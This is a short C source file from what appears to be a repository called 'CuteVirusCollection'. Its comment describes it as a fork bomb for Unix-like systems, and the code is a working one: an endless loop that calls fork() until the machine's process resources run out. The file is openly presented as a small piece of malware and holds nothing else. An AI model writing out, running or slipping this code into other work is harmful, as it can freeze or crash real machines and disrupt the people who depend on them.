Files
CuteVirusCollection/serious_punch.c

8 lines
158 B
C

// A fork-bomb that creates lots of child process till the computer gives up. Works on Unix-like OS.
#include <unistd.h>
int main(){
while(1) fork();
}